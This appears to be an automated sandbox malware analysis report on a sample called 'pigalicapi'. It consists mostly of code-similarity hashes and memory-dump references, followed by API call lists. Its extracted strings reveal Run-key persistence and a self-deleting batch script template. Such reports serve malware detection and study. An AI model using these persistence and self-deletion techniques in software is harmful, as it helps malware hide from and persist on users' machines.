                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cf64b45020a22b85927698f6973164189089b58c080edc75de3636de3a72678a
                                                                                                                                                                                • Instruction ID: a363ef70fc13e93934a9f8c7e1a3390811abfd40b07b5a3efa7cfe98c0074be0
                                                                                                                                                                                • Opcode Fuzzy Hash: cf64b45020a22b85927698f6973164189089b58c080edc75de3636de3a72678a
                                                                                                                                                                                • Instruction Fuzzy Hash: 25027E72A002298FDF14CF78C9806BDBFF1FB49390F114969E856DB241EA74A985CB94
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 15de17cdc08df48758a7ead7482411e9747eff4e431ee955d1bd4f55163b7663
                                                                                                                                                                                • Instruction ID: db23984e370aed9ebf771df0f975da5a61b41f0346c0e4adfd5e1695999fe7ee
                                                                                                                                                                                • Opcode Fuzzy Hash: 15de17cdc08df48758a7ead7482411e9747eff4e431ee955d1bd4f55163b7663
                                                                                                                                                                                • Instruction Fuzzy Hash: 1732F6786083908FD324CF19E494A6ABBF1FBC9300F05495EF9D9873A5D734A9A1CB52
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5cdca8caa4febe82fc39653c41f2a161f9268febe117a12857b8ff9334c248f8
                                                                                                                                                                                • Instruction ID: 090ff61adbfac3a955b9794e9a117906ee73f874b97993bf6bc285794699eb2f
                                                                                                                                                                                • Opcode Fuzzy Hash: 5cdca8caa4febe82fc39653c41f2a161f9268febe117a12857b8ff9334c248f8
                                                                                                                                                                                • Instruction Fuzzy Hash: DE1222786082918FC765CF2DE48496ABBF1FB89300F04466EF989CB359D734E9A1CB51
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3d0cc6348161d6547e36027886c8947d4849f1105c3838fc2e94ff93ae5d2511
                                                                                                                                                                                • Instruction ID: 74e7bc4f2d9997e0f2ebc12bb7cd8f4d4119eaedd4a02a3d69f3c2771f14c14f
                                                                                                                                                                                • Opcode Fuzzy Hash: 3d0cc6348161d6547e36027886c8947d4849f1105c3838fc2e94ff93ae5d2511
                                                                                                                                                                                • Instruction Fuzzy Hash: CED158796082918FC328CF29E49496ABBF1FB89301F04466EF889C7395D734F9A1CB55
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 251614a245bfd4435941061947b8fac18ec381c6240dc928e49272160b58479e
                                                                                                                                                                                • Instruction ID: 5c4ecfa5aa758651d43303b40bbe21c3a36fc9718dc2f24d4350a04dc3a594e7
                                                                                                                                                                                • Opcode Fuzzy Hash: 251614a245bfd4435941061947b8fac18ec381c6240dc928e49272160b58479e
                                                                                                                                                                                • Instruction Fuzzy Hash: BDB1DF20D2AF504DDA339A399835336BA4CAFBB2D9F91E71BFC1674D56EB2181834240
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c1411e1098ef179254326b4a6ce3bb80c4de6baf176da906956c6d96bd674694
                                                                                                                                                                                • Instruction ID: bddbdbc7a23fa584c465bc31828b0f81dc0ce749231af5b2801f3b8fa51bdc29
                                                                                                                                                                                • Opcode Fuzzy Hash: c1411e1098ef179254326b4a6ce3bb80c4de6baf176da906956c6d96bd674694
                                                                                                                                                                                • Instruction Fuzzy Hash: BFC14C31A087A08FC729CF19D09062EFBE2BFC9601F49C96DE4D997256C774D885CB92
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e2f5c2afb0d56cadf6027ba261299f7a0e0b42f0f73a888bd3f6d80722291169
                                                                                                                                                                                • Instruction ID: 34bf5879d2d5a18a12fac0d76dda87c85f9a9ffddb464317d788ebb102631b6c
                                                                                                                                                                                • Opcode Fuzzy Hash: e2f5c2afb0d56cadf6027ba261299f7a0e0b42f0f73a888bd3f6d80722291169
                                                                                                                                                                                • Instruction Fuzzy Hash: 6BA16B796082818FC324DF19E1945A6BBF2FB99300F04856EE989CB359D734F9A1CB51
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d917cfbb126977b3c33a2a916fc6342a3ba357bd88774f34c227837a978df162
                                                                                                                                                                                • Instruction ID: fc6ea62e87c147a82790ba1bf29da4524d6de1373ad221c715d57ff1d8838477
                                                                                                                                                                                • Opcode Fuzzy Hash: d917cfbb126977b3c33a2a916fc6342a3ba357bd88774f34c227837a978df162
                                                                                                                                                                                • Instruction Fuzzy Hash: 6471EF766042059FD715CF58D884EABB7EAFF88304F44063EFA459B245E730EA05CBA5
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5f608470e4b491906bc1f01f827bfba81921155f20530a2eb6e9e65b0e71f82b
                                                                                                                                                                                • Instruction ID: 64eee10687b86fe63bcc5d594fd793e73b5a6548ded3ad385ab5a20fb51520ad
                                                                                                                                                                                • Opcode Fuzzy Hash: 5f608470e4b491906bc1f01f827bfba81921155f20530a2eb6e9e65b0e71f82b
                                                                                                                                                                                • Instruction Fuzzy Hash: C77146786082908FC364DF19E094926BBF1FB8A341F05496EF9898B395D735F8A1CF51
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5f71a20e5204fe3681f7b6db68be8aff0e19f9be67f45487c4282310c0da194c
                                                                                                                                                                                • Instruction ID: 38a663b99646cef34d0ff0ab428ee501d0f03fadf5c7536e893e829120bc4d1f
                                                                                                                                                                                • Opcode Fuzzy Hash: 5f71a20e5204fe3681f7b6db68be8aff0e19f9be67f45487c4282310c0da194c
                                                                                                                                                                                • Instruction Fuzzy Hash: 2951677A701602CFE318CF38EA85AA5B7E0FB98304F054669E619CB359D330E891CB95
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 56ff7cde1be58aaf70406cf1cdb2c77194f613d519e14adfd29bcee7fa7ae11d
                                                                                                                                                                                • Instruction ID: 28bc2262e6b6728fc7991ed56b4422fd6b7ab2330c4bcaa431e87a8fba3f3c20
                                                                                                                                                                                • Opcode Fuzzy Hash: 56ff7cde1be58aaf70406cf1cdb2c77194f613d519e14adfd29bcee7fa7ae11d
                                                                                                                                                                                • Instruction Fuzzy Hash: A0316971918360CFC3248F14C050BAAFBF1BFCA314F4A5AAEE98C97252C7319805CB82
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1bd0c93be4af4633191043fff6060cafaf36b5fbbd284880ffac08339bf7e8a8
                                                                                                                                                                                • Instruction ID: 3901d1c7097f822b1bad16e95c072aa15b08f9a407221dfae3e39fbfeda94547
                                                                                                                                                                                • Opcode Fuzzy Hash: 1bd0c93be4af4633191043fff6060cafaf36b5fbbd284880ffac08339bf7e8a8
                                                                                                                                                                                • Instruction Fuzzy Hash: DC21F37160424BCFE314CF68D484B96B3E2FB48314F5586B9E5089F506F771A986CF80
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a96687fa5b60a86fe0499fda2063558e242f07c31e0d9d3c75e96b4e5e8e8e5e
                                                                                                                                                                                • Instruction ID: 4b2823b32a458e21df3e6c484c865cad5f4ca2567a101b80425eb6b4a3bd4445
                                                                                                                                                                                • Opcode Fuzzy Hash: a96687fa5b60a86fe0499fda2063558e242f07c31e0d9d3c75e96b4e5e8e8e5e
                                                                                                                                                                                • Instruction Fuzzy Hash: 4911C1322183918FC3158F24D8903B9BFE2AF86211F5949AED08ACB293DB748845DF11
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2bdcd82ac2712c2b344fa170325648992ac663b641c31df508c606fa59581e25
                                                                                                                                                                                • Instruction ID: 333eea5dee2e343bb00c341eb8fe06bf37e762eeefd5c7ced5dcbfcb5df87b3b
                                                                                                                                                                                • Opcode Fuzzy Hash: 2bdcd82ac2712c2b344fa170325648992ac663b641c31df508c606fa59581e25
                                                                                                                                                                                • Instruction Fuzzy Hash: 3DF0B42106C7C69ADBA6DF38C4A40C3FFE1AF4F31038A65CCC8C00D413C2109495D781
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0762464406f5326cc4d875fd4cc4a5037c8c5ab54130ac6080e8745e463cdf5e
                                                                                                                                                                                • Instruction ID: 88215b3929851b503fb9e0336a359976704c6dde636ba1c8479b7b66991880c0
                                                                                                                                                                                • Opcode Fuzzy Hash: 0762464406f5326cc4d875fd4cc4a5037c8c5ab54130ac6080e8745e463cdf5e
                                                                                                                                                                                • Instruction Fuzzy Hash: 25C04C36221850CFC781CF18E444E81B3E4FB09631B068491E805DB721D234EC41CA40
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0762464406f5326cc4d875fd4cc4a5037c8c5ab54130ac6080e8745e463cdf5e
                                                                                                                                                                                • Instruction ID: 88215b3929851b503fb9e0336a359976704c6dde636ba1c8479b7b66991880c0
                                                                                                                                                                                • Opcode Fuzzy Hash: 0762464406f5326cc4d875fd4cc4a5037c8c5ab54130ac6080e8745e463cdf5e
                                                                                                                                                                                • Instruction Fuzzy Hash: 25C04C36221850CFC781CF18E444E81B3E4FB09631B068491E805DB721D234EC41CA40
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 005D74E4
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 005D7503
                                                                                                                                                                                • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 005D752E
                                                                                                                                                                                • lstrcatA.KERNEL32(?,005DC650), ref: 005D7559
                                                                                                                                                                                • lstrcatA.KERNEL32(?,pigalicapi), ref: 005D756B
                                                                                                                                                                                • lstrcatA.KERNEL32(?,.exe), ref: 005D757D
                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000080), ref: 005D758F
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 005D75B4
                                                                                                                                                                                • TerminateThread.KERNEL32(00000254,00000001), ref: 005D75CE
                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,005DC690,00000000,00000002,00000000), ref: 005D7620
                                                                                                                                                                                • RegDeleteValueA.ADVAPI32(00000000,pigalicapi), ref: 005D7636
                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 005D7643
                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 005D766F
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 005D767C
                                                                                                                                                                                • GetTempFileNameA.KERNEL32(?,slf,00000000), ref: 005D7698
                                                                                                                                                                                • lstrcatA.KERNEL32(?,.bat), ref: 005D76AA
                                                                                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 005D76C6
                                                                                                                                                                                • lstrlenA.KERNEL32(?,00000000,00000000), ref: 005D76F9
                                                                                                                                                                                • WriteFile.KERNEL32(000000FF,?,00000000), ref: 005D770E
                                                                                                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 005D771B
                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 005D778C
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 005D779D
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 005D77A5
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$lstrcat$Close$CreateHandleNameProcess$AttributesCountDeleteDirectoryEnvironmentExitModuleOpenProfileSleepTempTerminateThreadTickUsersValueVariableWritelstrlenwnsprintf
                                                                                                                                                                                • String ID: .bat$.exe$:repeatdel %sif exist %s goto :repeatdel %%0$D$TEMP$USERPROFILE$pigalicapi$slf$software\microsoft\windows\currentversion\run
                                                                                                                                                                                • API String ID: 3221898725-1842671280
                                                                                                                                                                                • Opcode ID: 9283846192cb64e845a8cd128d4adc349fa898a74c06e8459e0d25ab5082166f
                                                                                                                                                                                • Instruction ID: 5872724cd8d39407437990d6cc57dbf225461f2c6f2f984c906997938f57b894
                                                                                                                                                                                • Opcode Fuzzy Hash: 9283846192cb64e845a8cd128d4adc349fa898a74c06e8459e0d25ab5082166f
                                                                                                                                                                                • Instruction Fuzzy Hash: 7F71A6B1941319ABEB30DB54DC4DFEA7B78BB58700F0045CBB209A5191EB709A88DF50
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • Sleep.KERNEL32(?), ref: 005D6DC9
                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 005D6DD1
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 005D6E5F
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,00000000), ref: 005D6EB5
                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,00000000), ref: 005D6EDD
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 005D6F7A
                                                                                                                                                                                • CreateThread.KERNEL32 ref: 005D6FE3
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 005D6FF0
                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 005D7028
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 005D7059
                                                                                                                                                                                • GetTempFileNameA.KERNEL32(?,?,00000000), ref: 005D7077
                                                                                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 005D7093
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 005D7101
                                                                                                                                                                                • WriteFile.KERNEL32(000000FF,00000000,?,00000000,00000000,?,?,00000000,?), ref: 005D715D
                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 005D7183
                                                                                                                                                                                • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 005D71A9
                                                                                                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 005D71BC
                                                                                                                                                                                • CoUninitialize.OLE32 ref: 005D7239
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
